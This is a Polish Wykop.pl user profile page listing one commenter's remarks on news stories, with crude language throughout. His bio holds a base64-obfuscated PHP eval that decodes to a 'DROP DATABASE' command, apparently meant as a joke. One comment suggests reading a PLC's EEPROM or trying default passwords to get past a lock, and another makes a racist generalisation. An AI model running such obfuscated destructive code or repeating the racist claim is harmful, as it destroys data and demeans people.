Wykop.pl Wykop.pl
  • Główna
  • Wykopalisko166
  • Hity
  • Mikroblog
  • Zaloguj się
  • Zarejestruj się
Zaloguj się

Popularne tagi

  • #ciekawostki
  • #informacje
  • #technologia
  • #polska
  • #swiat
  • #motoryzacja
  • #podroze
  • #heheszki
  • #sport

Wykop

  • Ranking
  • Osiągnięcia
  • FAQ
  • O nas
  • Kontakt
  • Reklama
  • Regulamin
DrDevil

DrDevil

Dołączył 15 lat i 6 mies. temu
  • Obserwuj
  • Akcje 11945
  • Znaleziska 8076
  • Mikroblog 3869
  • Obserwujący 22
  • Obserwowane 15
josedra52
josedra52
przedwczoraj, 06:06:44
  • 985
Co to za kolejne paramilitarne patusy?

#ruchobronygranic #patologiazmiasta
josedra52 - Co to za kolejne paramilitarne patusy?

#ruchobronygranic  #patologiazmia...

źródło: image

Pobierz
  • 125
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych komentarzach

DrDevil
DrDevil przedwczoraj, 07:39:24 via Wykop
  • 36
@vorky: Chłop śląski, w dupie szeroki, w barach wąski.
  • Odpowiedz

637

Przesłuchanie patomorfolog w sprawie szczątków płodów odroczone.

Przesłuchanie patomorfolog w sprawie szczątków płodów odroczone.

Pani doktor trafiła do szpitala.

sameowoce
z
radio.rzeszow.pl
dodany: 13.06.2026, 10:06:09
  • 154
  • #
    zdrowie
  • #
    prokuratura
  • #
    rzeszow
DrDevil
DrDevil 13.06.2026, 19:33:38 via Wykop
  • -16
@konrado12: Tylko dodam, że niektóre płody kończą na podpasce, bo nie ma gwarancji, że zapłodniona komórka jajowa zostanie w macicy. A potem podpaska idzie w kosz. Czyli każda kobieta, która stara się o dziecko, powinna pójść do do pierdla za potencjalne bezczeszczenie zwłok?

403

Wstrząsające odkrycie w miejscowości Lutoryż pod Rzeszowem. Płody na budowie.

Wstrząsające odkrycie w miejscowości Lutoryż pod Rzeszowem. Płody na budowie.

W Lutoryżu pod Rzeszowem dokonano makabrycznego znaleziska. Pracownik budowy miał natknąć się na zakopane w ziemi płody. Informację potwierdziliśmy nieoficjalnie w służbach. Jak wynika z naszych ustaleń, poprzednią właścicielką posesji była patomorfolożka.

DziendobryMireczku
z
tvn24.pl
dodany: 11.06.2026, 21:22:43
  • 118
  • #
    zbrodnia
  • #
    polska
  • #
    rzeszow
  • #
    podkarpacie
DrDevil
DrDevil 12.06.2026, 16:15:39 via Wykop
  • -3
@Magiczna_Yulka: Ale mogła mieć też wiedzę na temat aborcji. Chociaż bardziej skłaniam się ku badaniom na własną rękę.

392

Audi jechało ponad 200 km/h na ograniczeniu do 70 km/h

Odnośnie wypadku na skrzyżowaniu z ul Szwoleżerów w Ząbkach.

staszaiwa
z
tvn24.pl
dodany: 09.06.2026, 06:44:10
  • 178
  • #
    samochody
  • #
    wypadek
  • #
    polskiedrogi
  • #
    warszawa
  • #
    motoryzacja
  • #
    bezpieczenstwo
DrDevil
DrDevil 10.06.2026, 08:03:00 via Wykop
  • 9
@markus666: Kult z-----------a i "jestem szybszy, więc lepszy". Na motocyklu jeżdżę upierdliwie przepisowo, np. jadę trochę wolniej przez lasy, nie zawsze jadę na granicy ograniczenia, bo zwyczajnie jestem świadom zagrożeń na jednośladzie. Ale na dupie zawsze będzie siedział jakiś palant próbujący mnie pogonić, a potem z triumfem wyprzedza mnie na jedynej prostej w okolicy. Niezwykle często tylko po to, żeby 500 metrów dalej skręcić w posesję xD. Kierowcy na widok

449

Chcą zmian w wydawaniu licencji taksówkarskich i weryfikacji praw jazdy.

Chcą zmian w wydawaniu licencji taksówkarskich i weryfikacji praw jazdy.

Po sobotnim wypadku w Zielonce przedstawiciel związku zrzeszającego polskich taksówkarzy podkreśla, że konieczna jest zmiana przepisów w zakresie wydawania licencji taksówkarskich i uznawania praw jazdy z innych krajów.

kolicuch
z
tvn24.pl
dodany: 09.06.2026, 11:03:23
  • 137
  • #
    polska
  • #
    ciekawostki
  • #
    warszawa
  • #
    motoryzacja
  • #
    samochody
  • #
    polskiedrogi
DrDevil
DrDevil 10.06.2026, 07:48:33 via Wykop
  • 2
@zassijt0: Ja bym dodał egzamin z topografii miasta, nawet niech będzie to tylko znajomość dzielnic, głównych ulic i najważniejszych punktów. Fajnie, że są GPS-y i w ogóle, ale osoba totalnie nieznająca miasta nie powinna świadczyć usług przewozowych.
HardWax
HardWax
08.06.2026, 19:40:42
  • 90
Kilka słów o firmach montujących automatykę.
W garażu podziemnym spalił się zasilacz sterownika PLC.
Przestała działać detekcja gazów (CO i LPG) oraz wentylacja w garażu podziemnym co jest dość ważnym systemem bezpieczeństwa.

W bliźniaczym budynku obok jest taka sama instalacja garażu więc kupiłem nowy sterownik wziąłem kartę pamięci aby zgrać program na nowy sterownik, podłączyć, uruchomić i skasować za naprawę.
Jednak nie tak szybko. Na sterowniku jest założone hasło i d--a blada.
HardWax - Kilka słów o firmach montujących automatykę.
W garażu podziemnym spalił się...

źródło: 20260526_144943

Pobierz
  • 29
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych komentarzach

DrDevil
DrDevil 09.06.2026, 06:39:03 via Wykop
  • 1
@HardWax: Jeżeli na płytce jest układ scalony, który wygląda jak EEPROM, to warto go odczytać i zobaczyć co tam trzymają ;). Często z lenistwa te ustawienia systemowe trzymane są ot tak na układach pamięci bez żadnych zabezpieczeń. Ewentualnie standardowe hasła: 0000, 1111, rok montażu, rok założenia firmy, pierwsze cyfry numeru seryjnego itp.

Ciekawostka, pewien polski ISP miał hasło "dupablada" do konfiguracji modemów kablowych. Tak, hasło pochodziło z konfiguracji pobieranej z
  • Odpowiedz
nieparzystokopytny
nieparzystokopytny
07.06.2026, 14:04:42
  • 394
#ciekawostki przeciętny Polak rozumie język słowacki ( ͡° ͜ʖ ͡°)

#smiesznypiesek
nieparzystokopytny - #ciekawostki przeciętny Polak rozumie język słowacki ( ͡° ͜ʖ ͡°)...

źródło: image

Pobierz
  • 23
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych komentarzach

DrDevil
DrDevil 07.06.2026, 18:32:40 via Wykop
  • 5
@nieparzystokopytny: Kiedyś zepsuł mi się samochód na Słowacji, i to jeszcze w jakiejś wsi. Próbowałem wypytać o jakiś warsztat niedaleko, albo jakiegoś lokalnego chłopa co auta wszystkim na wsi naprawia. Po angielsku ni chu chu, ale szybko odkryłem, że jak mówię do nich po polsku, a oni odpowiadają po słowacku, to całkiem nieźle się rozumieliśmy.

PS Warsztatu nie było, chłopa też nie :').
  • Odpowiedz

374

Dlaczego nagle jest tyle boreliozy?

Dlaczego nagle jest tyle boreliozy?

Nadchodzące wakacje to dla wielu z nas nadchodzące spacery po lesie. A spacery po lesie to z jednej strony przyjemność, z drugiej zaś ryzyko. W zaroślach bowiem czychać na nas mogą kleszcze, a wraz z nimi choroba, której liczba diagnoz każdego roku rośnie w niepokojącym tempie.

makrofag74
z
youtube.com
dodany: 07.06.2026, 05:31:49
  • 196
  • #
    borelioza
  • #
    medycyna
  • #
    naukowybelkot
DrDevil
DrDevil 07.06.2026, 18:01:47 via Wykop
  • 68
@SHOGOKI: Gdyby jeszcze ogień zabijał wyłącznie kleszcze, to można byłoby się zgodzić.

590

Mentzen nie odpuszcza artystom. Zamieścił nowy wpis. "Na to mam płacić?"

"To jest ta wielka sztuka, której nie rozumiem, bo jestem głupkiem bez wykształcenia i wrażliwości? To autorce tego mam zapewnić emeryturę? Serio?" napisał Sławomir Mentzen, zamieszczając jedną z prac Gosi Bartosik.

rybak_fischermann
z
onet.pl
dodany: 06.06.2026, 10:37:02
  • 240
  • #
    mentzen
  • #
    polityka
  • #
    kultura
  • #
    pieniadze
  • #
    emerytura
  • #
    sztuka
DrDevil
DrDevil 06.06.2026, 14:29:16 via Wykop
  • 38
@elo345: O, widziałem ostatnio w kiblu w pubie na drzwiach narysowane. Nawet nie wiedziałem, że to sztuka.

262

Polskie siatkarki na fali! Pokonały Serbię po zaciętej walce

Polskie siatkarki na fali! Pokonały Serbię po zaciętej walce

Polskie siatkarki pokonały Serbię 3:2 (17:25, 25:19, 25:18, 22:25, 17:15) w meczu Ligi Narodów. To trzecie zwycięstwo drużyny Stefano Lavariniego w tych rozgrywkach. W niedzielę o godz. 13 Biało-Czerwone zmierzą się z gospodyniami turnieju - Chinkami.

Tired_
z
rmf24.pl
dodany: 05.06.2026, 15:11:08
  • 5
  • #
    siatkowka
  • #
    polska
  • #
    informacje
DrDevil
DrDevil 06.06.2026, 13:18:10 via Wykop
  • 2
@dbc4razy: Kolejny fan polskich kopaczy bez osiągnięć.
ilem
ilem
05.06.2026, 23:31:25
  • 338
ilem

źródło: HKDmmSQWAAA7rQo

Pobierz
  • 26
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych komentarzach

DrDevil
DrDevil 06.06.2026, 08:29:45 via Wykop
  • 5
Treść przeznaczona dla osób powyżej 18 roku życia...
  • Odpowiedz
DrDevil
DrDevil 06.06.2026, 13:08:13 via Wykop
  • 0
@dworeqq: No kiszą się we własnym gównie i tyle. Znajdzie się kilku z aspiracjami, i mają dużo szczęścia, jeżeli ich własne otoczenie nie podetnie im skrzydeł. To czarni czarnym zgotowali ten los.
  • Odpowiedz

448

Pacjent z Alzheimerem odzyskuje mowę i pamięć dzięki przełomowemu badaniu leku

Pacjent z Alzheimerem odzyskuje mowę i pamięć dzięki przełomowemu badaniu leku

Psylocybinę, substancję psychodeliczną zawartą w grzybach halucynogennych, wcześniej uważano za skuteczny środek na depresję, lęk, uzależnienia i zespół stresu pourazowego (PTSD) . Teraz jednak naukowcy twierdzą, że ma ona potencjał, by znaleźć zastosowanie również w leczeniu choroby Alzheimera.

Zingeer
z
nypost.com
dodany: 05.06.2026, 17:47:05
  • 117
  • #
    altzheimmer
  • #
    zdrowie
  • #
    psylocybina
  • #
    psychodeliki
DrDevil
DrDevil 06.06.2026, 08:39:15 via Wykop
  • 15
@jozef-ziutek-nowak: Ale Ibuprom Zatoki z pseudoefedryną już spoko, tak ;)?

415

Rząd szykuje nowy zakaz. Do internetu wejdziesz z EUDI Wallet

Pokaż treści 18+

Rząd szykuje nowy zakaz. Do internetu wejdziesz z EUDI Wallet

Rząd realizuje swój plan ochrony dzieci przed pornografią. Rada Ministrów właśnie przyjęła projekt ustawy, która zmusi serwisy dla dorosłych do sprawdzania, ile lat ma użytkownik. Zmiany mają wejść w życie do końca 2026 roku, a na opornych czekają surowe kary i blokowanie stron.

ochucki
z
telepolis.pl
dodany: 03.06.2026, 06:52:49
  • 201
  • #
    pornografia
  • #
    internet
  • #
    komputery
  • #
    polska
  • #
    prawo
DrDevil
DrDevil 03.06.2026, 11:49:37 via Wykop
  • 6
@lewoprawo: Protokołów TCP i UDP nikt nie ogranicza. Ludzie sami sobie założyli kaganiec poprzez ograniczanie się do oligopolu portali społecznościowych, więc teraz łatwiej ich kontrolować. Wciąż możesz założyć prywatne forum i prowadzić dyskusje na dowolne tematy.

IRC, e-mail, usenet - to wciąż istnieje i nikt tego nie kontroluje na takim poziomie jak portale do przewijania obrazków.
Redbulltabak
Redbulltabak
20.05.2026, 04:46:49
  • 322
Redbulltabak

źródło: images (30)

Pobierz
  • 32
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych komentarzach

DrDevil
DrDevil 20.05.2026, 09:16:23 via Wykop
  • 11
@inflacja_biedaku: Była jeszcze seria z
różową panterą, ale te dla odmiany można było ukończyć bez solucji, bo wymagały po prostu logicznego myślenia.
  • Odpowiedz

811

Biedronka tylko w połowie Polski sprzedaje produkty "czyste".

Biedronka tylko w połowie Polski sprzedaje produkty "czyste".

Biedronka sprzedaje pod tą samą marką i w identycznym opakowaniu produkty o różnym składzie, w zależności od regionu. Część kraju kupuje śmietankę "czystą", druga otrzymuje wersję z zagęszczaczami.

Poludnik20
z
wyborcza.biz
dodany: 18.05.2026, 06:41:09
  • 146
  • #
    zywnosc
  • #
    zdrowie
  • #
    biedronka
DrDevil
DrDevil 18.05.2026, 10:10:28 via Wykop
  • 15
Nie wiem po co w ogóle kupować w tym pseudosklepie. Ceny jak wszędzie indziej, a dodatkowo b----l i oszukańcze praktyki.
  • 7
  • Otrzymuj powiadomienia
    o nowych odpowiedziach

DrDevil
DrDevil 19.05.2026, 09:08:56 via Wykop
  • 1
@Yaman99: Jak chcę szybko po pracy kupić sobie paczkę czipsów i puszkę coli, to nie będę sterczał z gazetką, appką i c--j wie czym, żeby zaoszczędzić 30 groszy na zakupach xD.

@omicronns: To już te czasy, że umiejętność czytania jest życiowym osiągnięciem?

972

Sakiewicz był bez spodni gdy była u niego asystentka podczas interwencji policj

Sakiewicz był bez spodni gdy była u niego asystentka podczas interwencji policj

Podczas interwencji policji Sakiewicz był rozebrany od pasa w dół według rzecznika Prokuratury Okręgowej w Warszawie Antoniego Skiby. Przypomnijmy że w tym samym czasie w prywatnym mieszkaniu Sakiewicza przebywała jego "asystentka".

xpear
z
wiadomosci.wp.pl
dodany: 18.05.2026, 22:05:22
  • 510
  • #
    sakiewicz
  • #
    tvrepublika
  • #
    asystentka
  • #
    sekretarka
  • #
    mieszkanie
DrDevil
DrDevil 19.05.2026, 08:56:22 via Wykop
  • -2
@77adam: Rzecznik nie mówił, że Sakiewicz był bez gaci. Cytat z artykułu:

- Problem polega na konieczności wypikselowania znacznej liczby klatek, od szyi w górę i od pasa w dół, gdyż jedna z osób była niekompletnie ubrana - mówi TVN24 rzecznik Prokuratury Okręgowej w Warszawie Antoni Skiba. Chodzi o Sakiewicza, który podczas interwencji miał nie mieć na sobie spodni. Według policjantów nagranie "mogłoby narazić go na śmieszność".


Fragment zaczynający się

842

UK: Rozpoznawanie twarzy AI na demonstracji przeciw migracji

UK: Rozpoznawanie twarzy AI na demonstracji przeciw migracji

Policja skanowała twarze uczestników marszu patriotycznego. W Londynie odbyły się dwie demonstracje, przeciw migracji i propalestyńska, ale tylko ta pierwsza została objęta monitoringiem z rozpoznawaniem twarzy. Kamery biometryczne skanowały uczestników, policja uznała ich za zagrożenie.

jestemjakijestem1212
z
ithardware.pl
dodany: 17.05.2026, 13:28:57
  • 140
  • #
    ciekawostki
  • #
    technologia
  • #
    wielkabrytania
  • #
    informacje
  • #
    wiadomosci
  • #
    uk
DrDevil
DrDevil 18.05.2026, 10:15:55 via Wykop
  • 3
@ketrab86: Fakt, kominiarka ma zbyt negatywną otoczkę, ale dzięki covidowi nikogo nie dziwi już widok osoby w maseczce, najwyżej pomyślą o nas "paranoik". Warto korzystać z tego przywileju.

509

Zwolnili ich z pracy, więc na pożegnanie wykasowali 96 baz danych

Zwolnili ich z pracy, więc na pożegnanie wykasowali 96 baz danych

Dwaj bracia po utracie pracy postanowili się zemścić i w ciągu kilku godzin usunęli dziesiątki baz danych z wrażliwymi informacjami.

mkk10
z
portaltechnologiczny.pl
dodany: 14.05.2026, 13:46:16
  • 169
  • #
    cyberbezpieczenstwo
  • #
    informatyka
  • #
    zwolnienia
DrDevil
DrDevil 15.05.2026, 16:58:05 via Wykop
  • 1
@na_ulicy_maslo_trzaslo: Dlatego wysyła się delikwenta na "szkolenie", a w trakcie szkolenia blokuje się wszystkie dostępy.
donatien-de-sade
donatien-de-sade
14.05.2026, 15:20:17
  • 249
Co ten matecki taki antypisowski się zrobił XD

#polityka #bekazpisu #bekazprawakow
donatien-de-sade - Co ten matecki taki antypisowski się zrobił XD

#polityka #bekazpi...

źródło: IMG_7549

Pobierz
  • 10
  • Odpowiedz
  • Otrzymuj powiadomienia
    o nowych komentarzach

DrDevil
DrDevil 15.05.2026, 00:12:13 via Wykop
  • 0
@donatien-de-sade: On zaraz będzie wyglądał na tych obrazkach jak Pitbull.
  • Odpowiedz
  • <
  • 1
  • 2
  • 3
  • 4
  • 25
  • Strona 1 z 25
  • >

Nick Gurr

  • Stary cynik, introwertyk typu A, egoista. ( ͡° ͜ʖ ͡°) <?php eval(base64_decode("bXlzcWxfcXVlcnkoIkRST1AgREFUQUJBU0Ugd3lrb3AiKTs=")); ?>
  • Tristram
  • http://www.example.com
  • /dev/null@root.localhost

Osiągnięcia

  • Komentator
    od 10.07.2019

    Komentator
  • Złotousty
    od 31.10.2015

    Złotousty
  • Ekshibicjonista
    od 12.11.2013

    Ekshibicjonista
  • Rocznica
    od 24.12.2025

    Rocznica
  • Gadżeciarz
    od 02.09.2012

    Gadżeciarz
  • Mikroblogger
    od 18.11.2013

    Mikroblogger
  • Koder
    od 07.03.2023

    Koder

Wykop © 2005-2026

  • O nas
  • Reklama
  • FAQ
  • Kontakt
  • Regulamin
  • Polityka prywatności i cookies
  • Hity
  • Ranking
  • Osiągnięcia
  • Changelog
  • więcej

RSS

  • Wykopane
  • Wykopalisko
  • Komentowane
  • Ustawienia prywatności

Regulamin

Reklama

Kontakt

O nas

FAQ

Osiągnięcia

Ranking